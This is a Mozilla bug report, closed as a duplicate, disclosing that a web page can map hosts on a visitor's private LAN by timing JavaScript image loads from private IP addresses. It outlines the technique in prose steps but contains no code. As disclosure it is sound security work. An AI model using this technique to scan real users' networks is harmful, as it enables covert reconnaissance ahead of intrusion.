Closed Bug 453230 Opened 16 years ago Closed 16 years ago

Malicious Website can scan for IP addresses and web applications on private LAN using javascript remote timing attack

Categories

(Core :: Security, defect)

Product:
Core
Component:
Security
Platform:
x86
Linux
Type:
defect
Priority:
Not set
Severity:
critical

Tracking

()

Status:
RESOLVED DUPLICATE of bug 354493

People

(Reporter: domains, Unassigned)

References

(
URL
)

Details

User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071719 Firefox/3.0.1 Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071719 Firefox/3.0.1 This issue is not specific to Firefox--the example has worked in every browser that I have tried that support Javascript. A malicious page can reference elements on the local area network, such as "hotlinking" images. By "hotlinking" an image on an IP "website" on the target LAN (such as http://192.168.0.1/), the attacker can test if hosts are responding based on the amount of time it takes to return an error. In an extension, once responding hosts are identified, they could be tested for the existence of common software at comment URL's by testing for images (in the same method above). Reproducible: Always Steps to Reproduce: (See the example page for a working demo) 1. Construct a page loading "images" from hosts on LAN 2. Use javascript to determine the time required to load "images" 3. Differentiate between hosts based on time--hosts requiring very low or very high time are likely to be responding, or firewalled, respectively. Actual Results: The browser reveals an accurate map of the targeted LAN to the attacking webserver. Expected Results: Perhaps the browser should differentiate between hosts on the LAN and hosts on the Internet, and disallow hotlinking between public websites and private IP's. Works in every browser (not just Firefox)
I should note that this bug has similarities to, but is not identical to, Bug 377117 which uses a timing attack to determine if a page is in the browser cache. However, this is not testing a user's cache, but rather scanning the local area network for running hosts (possibly, but not necessarily, running webservers). An article about similar timing attacks (but not addressing this particular attack) is at http://www.cs.princeton.edu/sip/pub/webtiming.pdf.
Product: Firefox → Core
QA Contact: firefox → toolkit
seems to be a dupe of bug 354493
Status: UNCONFIRMED → RESOLVED
Closed: 16 years ago
Resolution: --- → DUPLICATE
Group: core-security
You need to log in before you can comment on or make changes to this bug.